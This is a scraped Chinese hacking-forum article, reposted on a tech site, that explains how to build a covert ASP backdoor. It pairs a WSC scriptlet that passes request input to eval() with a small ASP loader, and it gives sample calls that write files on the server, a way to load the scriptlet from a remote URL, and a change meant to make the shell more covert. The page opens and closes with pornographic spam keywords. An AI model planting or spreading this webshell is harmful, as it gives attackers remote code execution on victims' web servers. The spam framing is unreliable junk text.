成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

利用wsc來做一個asp后門及后續

安全 黑客攻防
利用wsc來做一個asp后門及后續……

ScriptCodingInfo.wsc代碼如下,該文件可以改成任意后綴:

以下是引用片段:







sub lcx(b)
eval(b)

end sub
]]>


backdoor.asp內容如下:

以下是引用片段:
<%
b=request("a")
Set fs = GetObject("script:d:/web/wwwroot/ScriptCodingInfo.wsc#haiyangtop")
fs.lcx(b)
%>

調用方法如下:

以下是引用片段:
http://url/backdoor.asp?a=CreateObject("Scripting.FileSystemObject").
OpenTextFile("c:\1122.txt"),8,True,0).WriteLine("123")

注意這里的a=只能是vbs的代碼,不可以接受像response、request之類的asp的東東。如果是2000服務器可以在backdoor.asp遠程調用ScriptCodingInfo.wsc,像Set fs = GetObject("script:http://www.xx.com/ScriptCodingInfo.wsc#haiyangtop")

2003服務器中不可以。算一個思路,雞肋,誰有更好的辦法完善,能夠直接調用cs的asp木馬的c端就好了。
#p#

突然看到了lcx巨形牛頭人發了一個帖子
http://hi.baidu.com/myvbscript/blog/item/62e6204e4805dacdd0c86a6a.html
但是就像牛頭人所說的,沒有加進request和response類很不爽。于是我作了一個簡單的修改。

ScriptCodingInfo.wsc 代碼

以下是引用片段:







sub lcx(b,a,c)
set response=c ’加入request和response進來。就可以直接調用了
set request=a ’修改 by:phpeval.cn
eval(b)
end sub
]]>


test.asp代碼:

<% 
b=request("a")
Set fs = GetObject("script:d:/web/wwwroot/ScriptCodingInfo.wsc#haiyangtop")
fs.lcx b,request,response
%>

測試方法:

以下是引用片段:

不知道這是不是lcx巨形牛頭人所說的那個c端。我一直不太理解“能夠直接調用cs的asp木馬的c端就好了”lcx巨牛的這句話的意思
如果改成
Set fs = GetObject(request("b"))
然后用

以下是引用片段:
wsc%23haiyangtop&c=phpeval

這樣好象更有誘惑性。

【編輯推薦】

  1. 4.1.7 使用SQLRootKit網頁數據庫后門控制案例
  2. 入侵Windows2000系統放置后門的方法
  3. Linux下的后門和日志工具
責任編輯:佚名 來源: 黑客風云
相關推薦

2011-12-20 10:02:01

ASP.NET

2015-07-03 11:27:30

程序員自己神器

2019-09-10 09:12:54

2017-06-30 15:18:24

對賬系統互聯網

2012-12-17 12:58:18

WebjQuery重構

2020-05-26 10:38:51

安全 黑客Windows

2018-01-04 16:04:35

圓環放大動畫

2021-12-17 10:06:42

鴻蒙HarmonyOS應用

2016-11-23 18:13:44

javascriptrxjsreactivex

2011-02-28 09:22:47

SQLite記賬簿

2017-06-19 08:30:35

大數據數據可視化報表

2014-04-29 10:50:16

池建強

2019-04-22 10:25:52

程序員技術職場

2021-12-01 07:02:55

Python 記錄器按鍵

2020-07-20 10:00:52

Python翻譯工具命令行

2018-06-08 16:18:43

Python微信聊天機器人

2009-09-15 09:23:35

初級linuxLinuxlinu操作系統x后門

2021-12-19 22:00:31

APP軟件開發開發

2013-04-23 14:32:28

創業創業者Mark Suster

2012-04-10 16:26:46

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 日韩乱码一二三 | 天天玩天天干天天操 | 成年人视频在线免费观看 | av毛片| 精彩视频一区二区三区 | 日韩黄色免费 | 久久蜜桃精品 | 午夜成人免费视频 | 欧美日韩中文字幕在线播放 | 中文字幕乱码视频32 | 日韩电影一区二区三区 | 国产免费va | 亚洲一区二区不卡在线观看 | 久久久婷| 亚洲国产一区二区三区在线观看 | 亚洲免费一 | 热re99久久精品国产99热 | 亚洲三级国产 | 国产高清美女一级a毛片久久w | 2020天天操| 欧美日韩亚洲系列 | 成人三级视频 | 亚洲日韩中文字幕一区 | 日韩精品专区在线影院重磅 | 看真人视频一级毛片 | 日韩不卡一二区 | 91p在线观看 | 亚洲男人天堂网 | av大全在线观看 | 日本a级大片 | 天天综合网91 | 国产精品呻吟久久av凹凸 | 国产高清一区二区三区 | 色噜噜色综合 | 免费一级淫片aaa片毛片a级 | 中文字幕一区二区三区乱码图片 | 成人性生交大片免费看r链接 | 黄网站色大毛片 | 自拍视频在线观看 | 国产成人久久精品 | 天堂一区在线 |